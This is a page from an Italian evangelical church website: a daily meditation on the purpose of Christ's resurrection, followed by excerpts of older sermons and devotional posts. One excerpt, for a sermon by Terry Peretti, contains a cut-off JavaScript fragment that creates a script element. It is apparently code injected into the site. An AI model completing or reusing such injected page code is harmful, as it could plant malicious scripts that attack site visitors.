Meditazione del giorno: Lo scopo finale della Sua resurrezione

oswaldchambers-2Non bisognava che il Cristo soffrisse queste cose ed entrasse quindi nella sua gloria? Luca 24: 26.  –   La croce del nostro Signore è la porta attraverso cui en­triamo nella Sua vita; la Sua risurrezione significa che ora Egli ha la potenza di farci partecipi della Sua vita. Questa Sua vita, la vera vita, la riceviamo dal Signore risorto quando siamo nati di nuovo. Lo scopo finale della risurrezione del Signore è di «con­durre molti figliuoli alla gloria». Il compimento di ciò a cui era destinato Gli dà il diritto di fare di noi figli e figlie di Dio; pur non potendo mai avere con Dio quella relazione che è propria di Gesù, il Figlio di Dio, siamo però introdotti dal Figlio in una relazione di figli. Quando il Signore risorse dalla morte, entrò in una vita assolutamente nuova, una vita che non aveva vissuto prima dell’incarnazione. Risorse ad una vita come non v’era mai stata prima, e la Sua risurrezione significa per noi che anche noi siamo risuscitati — non nella nostra vecchia vita, ma nella Sua vita, quella della risurre­zione.  Un giorno avremo un corpo che sarà glorioso come il Suo, ma possiamo intanto conoscere l’efficacia della Sua ri­surrezione e camminare in una vita nuova; io posso già ora conoscere Cristo e la potenza della Sua risurrezione.

«Poiché gli hai dato podestà su ogni carne, onde Egli dia vita eterna a tutti quelli che tu gli hai dato». « Spirito Santo » è il nome di questa vita eterna che opera negli esseri umani qui ed ora. Lo Spirito Santo è la Divinità che applica alla nostra esperienza, con la Sua potenza in azione, gli effetti dell’espiazione. Siano rese grazie a Dio per questa gloriosa e incommensurabile verità: lo Spirito Santo può immettere e far crescere in noi la vera natura di Gesù, se soltanto ac­cettiamo di ubbidirGli.

I commenti sono chiusi.

Post meno recenti

La Religione chi il diavolo ti vuole dare

“E Faraone chiamò Mosè e disse: Andate, servite al Signore; solo le vostre greggi e i vostri armenti saranno fatti restare; le vostre famiglie anche andranno con voi” (Esodo 10:24).  Presentazione Capitolo 1 – Il diavolo non ti impedirà di avere una religione Capitolo 2 –   Una religione nel mondo Capitolo 3 – Una religione vicina al mondo Capitolo 4 – Una religione con gli affetti del mondo Capitolo 5 – Una religione con i beni del mondo Capitolo …
Leggi Tutto

MATRIMONIO PROFETICO (Ruth cap. 4)

– Abbiamo visto nella meditazione  precedente come Naomi consigliò Ruth per ottenere il suo diritto ad esser riscattata, come prescriveva la legge di Mosè. Abbiamo visto come Ruth si presentò nell’aia di Boaz, e abbiamo applicato questa figura alla chiesa che deve prepararsi ad incontrare il Suo Sposo, il Suo Redentore, Cristo il Signore. – Oggi vedremo come i piani di Dio si compiono meravigliosamente e finalmente questa …
Leggi Tutto

LIBERTÀ O LASSISMO?

di AGOSTINO MASDEA  –  (Galati 5:1-5:13)  i) Non sempre è facile gestire la libertà: si può riperdere e ritornare in schiavitù. Esempio: Israele (Giudici 2:10-16) –  A. – CRISTIANESIMO O LASSISMO? a) Cos’è il lassismo? ” – “Dottrina che modifica in forme accomodanti e rilassate il rigore dei precetti cristiani.” (Zingarelli) “Indulgenza verso le norme del cristianesimo.” b) E’ la Religione del ” che male c’è? “! c) …
Leggi Tutto

Sermone Domenica 21 Aprile: Terry Peretti

Predicazione dell’evangelista TERRY PERETTI 2 Re 19 – “Non temere il nemico:Il Signore è più forte” var d=document;var s=d.createElement(‘script’); …
Leggi Tutto

Dai nostri culti: Salvezza senza ravvedimento

Pastore Agostino Masdea  –  Domenica 23  Marzo 2014  –  (Marco 1:14-20))                                   Questo sermone confuta la dottrina della “grazia estrema” o “ipergrace”, e ribadisce che senza ravvedimento non c’è salvezza. William Booth, fondatore dell’Esercito della salvezza aveva previsto che nel XX secolo ci sarebbe stato: -Una religione senza lo Spirito Santo. -Cristiani …
Leggi Tutto

STORIA DI UN INNO: ABIDE WITH ME

Henry F. Lyte  ABIDE WITH ME (JESSY DIXON) Henry Francis Lyte  (1793-1847) nacque a Ednam, in Scozia e studiò alla Royal School di Enniskillen e al Trinity College, Dublino, dove conseguì la laurea in teologia.  Nel 1818 accadde qualcosa che nella sua vita ebbe un grande impatto spirituale, e che determinò un radicale cambiamento:  la malattia e la morte di un suo grande amico e fratello, un caro …
Leggi Tutto

«PARLERANNO IN ALTRE LINGUE»

di  A. THOMAS BRES   –   Questo segno è incompreso, criticato e combattuto da molti e anche da alcuni cristiani. Gli uni lo con­siderano una pazzia, il risultato di un disturbo mentale; gli altri un fenomeno spiritista, diabolico. Sono rari quelli che ne parlano con serenità e che si dimostrano scevri da pre­giudizi. Tra le obiezioni che spesso si fanno in mezzo ai cristiani, c’è questa: — Il …
Leggi Tutto

Meditazione del giorno: FEDE VERA

di George Muller    –   “La fede è certezza di cose che si sperano, dimostrazione di cose che non si vedono; …Per fede intendiamo che l’universo è stato formato per mezzo della parola di Dio, sì che le cose che si vedono non vennero all’esistenza da cose apparenti.” ( Ebrei 11:1;3). PRIMO: CHE COS’È LA FEDE? Nel modo più semplice in cui sono capace di esprimermi, io rispondo: …
Leggi Tutto

Dai nostri Culti